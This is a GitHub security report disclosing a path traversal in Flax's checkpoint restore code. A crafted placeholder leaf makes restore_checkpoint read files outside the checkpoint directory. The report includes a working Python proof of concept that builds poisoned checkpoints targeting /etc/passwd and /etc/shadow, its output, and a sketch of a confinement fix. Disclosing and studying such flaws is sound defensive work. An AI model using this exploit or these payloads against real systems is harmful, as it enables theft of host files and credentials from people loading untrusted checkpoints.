[Security] Path traversal / arbitrary file read on restore_checkpoint via a malicious multiprocess-array placeholder leaf #5487

@geo-chen

Reporting here as confirmed with Google bug hunters:


We've reviewed it, and while we appreciate you flagging this, we need to let you know that we're no longer offering rewards for product vulnerabilities like this one in projects that fall into the OT2 or OT3 tiers. The Flax repository, https://github.com/google/flax, is currently categorized in this way for reward eligibility. You're still welcome to open an issue or submit a pull request directly on the GitHub repo if you'd like to help get this fixed!

Summary

restore_checkpoint treats any checkpoint leaf string that begins with the placeholder //GDAPlaceholder: as a multiprocess-array reference, and joins the attacker-controlled suffix onto the checkpoint directory with no confinement check. A crafted checkpoint can therefore make Flax open and read files outside the checkpoint directory (via tensorstore) through the documented multi-host restore path.

Details

flax/training/checkpoints.py, _restore_mpas (L333-334):

mpa_path = os.path.join(ckpt_path + MP_ARRAY_POSTFIX, value[len(MP_ARRAY_PH):])

value is a leaf taken from the msgpack checkpoint, so everything after the MP_ARRAY_PH = '//GDAPlaceholder:' prefix (L71) is attacker-controlled. The joined path feeds get_tensorstore_spec(path) (L288) and then gda_manager.deserialize(...) (L289), which opens and reads it. An absolute suffix (/etc/passwd) makes os.path.join discard the base entirely; a ../ suffix escapes the …_gda dir. The root cause is a save/restore asymmetry: on save the suffix is a benign relative pytree key (L183), but on restore it is trusted without validation.
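The two escape modes described above can be reproduced with the standard library alone. This is a minimal sketch, not Flax code: joined_path is a hypothetical helper that mirrors the quoted join, the "_gda" postfix is inferred from the "…_gda dir" wording rather than read from the source, and /ckpts/checkpoint_0 is a made-up checkpoint path. posixpath is used so the result is the same on any host, and normpath is applied only to make the escape easy to see.

```python
import posixpath  # POSIX flavour of os.path, so results match on any host

MP_ARRAY_PH = "//GDAPlaceholder:"  # prefix quoted in the report
MP_ARRAY_POSTFIX = "_gda"          # assumption: inferred from the report's wording


def joined_path(ckpt_path: str, leaf: str) -> str:
    """Mirror the join quoted from _restore_mpas, then normalise for display."""
    suffix = leaf[len(MP_ARRAY_PH):]  # attacker-controlled part of the leaf
    raw = posixpath.join(ckpt_path + MP_ARRAY_POSTFIX, suffix)
    return posixpath.normpath(raw)


if __name__ == "__main__":
    # One benign relative key, one absolute suffix, one dot-dot suffix.
    for payload in ("params", "/etc/passwd", "../../../etc/shadow"):
        leaf = MP_ARRAY_PH + payload
        print(f"{payload!r} -> {joined_path('/ckpts/checkpoint_0', leaf)}")
```

Only the benign key stays under /ckpts/checkpoint_0_gda; the absolute suffix replaces the base outright, and the ../ suffix climbs out of it.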

Reachability: this is the documented multi-host restore path. The caller passes a gda_manager and a target containing a multiprocess (non-fully-addressable) jax.Array at the poisoned key (gating _check_mpa_errors). That is the normal state of arrays under jax.distributed/multi-host pjit.

PoC

poc_mpa_traversal.py crafts a msgpack checkpoint whose leaf is MP_ARRAY_PH + "/etc/passwd" and restores it with a recording array manager that captures the path Flax asks it to read. Output:

payload='/etc/passwd'             -> READ PATH: /etc/passwd   escaped_dir=True
payload='../../../../../etc/shadow' -> READ PATH: /etc/shadow  escaped_dir=True

poc_mpa_traversal.py:


#!/usr/bin/env python3
"""
PoC: arbitrary file read / path traversal in flax.training.checkpoints.restore_checkpoint
(flax 0.12.7). Sink: flax/training/checkpoints.py:333-334 (_restore_mpas) — an attacker leaf
"//GDAPlaceholder:<suffix>" is os.path.join'd onto the ckpt dir with no confinement; an
absolute/`..` suffix escapes, and flax reads it via tensorstore.

Precondition (documented multi-host restore): target has a non-fully-addressable jax.Array at
the poisoned key. MPALeaf is a faithful stand-in (isinstance jax.Array True, is_fully_addressable
False) — exactly an array's state under jax.distributed/multi-host pjit. No flax code modified.
Requires: pip install flax jax jaxlib
"""
import os, tempfile, jax, jax.numpy as jnp
from flax import serialization
from flax.training import checkpoints
from flax.training.checkpoints import MP_ARRAY_PH, _is_multiprocess_array

class MPALeaf:
    is_fully_addressable = False
    def __init__(self, a): object.__setattr__(self, "_a", a)
    def __getattr__(self, k): return getattr(object.__getattribute__(self, "_a"), k)
    @property
    def __class__(self): return type(jnp.arange(1))   # pass isinstance(.., jax.Array)

victim = MPALeaf(jnp.arange(4))
assert isinstance(victim, jax.Array) and _is_multiprocess_array(victim)
target = {"params": victim}
captured = {}
class RecordingGdaManager:
    def wait_until_finished(self): pass
    def deserialize(self, shardings, ts_specs, *a, **k):
        captured["ts_specs"] = list(ts_specs); return [jnp.zeros(4) for _ in ts_specs]

def run(payload):
    captured.clear()  # drop state left over from a previous run
    with tempfile.TemporaryDirectory() as d:
        ckpt = os.path.join(d, "checkpoint_0")
        # Checkpoint whose only leaf is the placeholder plus the attacker-controlled suffix.
        with open(ckpt, "wb") as f:
            f.write(serialization.msgpack_serialize({"params": MP_ARRAY_PH + payload}))
        checkpoints.restore_checkpoint(ckpt, target=target, gda_manager=RecordingGdaManager())
        # Path that flax handed to the array manager for reading.
        path = captured["ts_specs"][0]["kvstore"]["path"]
        escaped = not os.path.abspath(path).startswith(os.path.abspath(d))
        print(f"payload={payload!r:30} -> READ PATH: {path}  escaped_dir={escaped}")
        return escaped

ok = run("/etc/passwd") and run("../../../../../../etc/shadow")
print("CONFIRMED: checkpoint leaf -> arbitrary out-of-dir read path" if ok else "not reproduced")
raise SystemExit(0 if ok else 1)

Impact

Loading an untrusted Flax checkpoint (a common ML supply-chain scenario) on the multi-host restore path causes arbitrary host files to be read into the restored state, which is a confidentiality impact. No code execution.
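For reference, the kind of confinement check the Summary says is missing could look roughly like the sketch below. This is an illustration under stated assumptions, not a proposed patch to Flax: confined_join is a hypothetical helper name, and the choice to resolve symlinks with os.path.realpath and reject with ValueError is a design assumption.

```python
import os


def confined_join(base_dir: str, suffix: str) -> str:
    """Join suffix under base_dir and refuse any result that resolves outside it.

    Hypothetical helper for illustration; not part of flax.
    """
    base = os.path.realpath(base_dir)
    # realpath collapses "..", follows symlinks, and lets an absolute suffix
    # replace the base, so the comparison below sees the path actually opened.
    candidate = os.path.realpath(os.path.join(base, suffix))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes checkpoint directory: {suffix!r}")
    return candidate


if __name__ == "__main__":
    base = os.path.join(os.getcwd(), "checkpoint_0_gda")  # made-up directory
    for suffix in ("params", "/etc/passwd", "../../etc/shadow"):
        try:
            print(f"{suffix!r} accepted as {confined_join(base, suffix)}")
        except ValueError as err:
            print(f"{suffix!r} rejected: {err}")
```

Comparing with os.path.commonpath rather than a plain startswith avoids accepting a sibling directory that merely shares a name prefix with the base.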
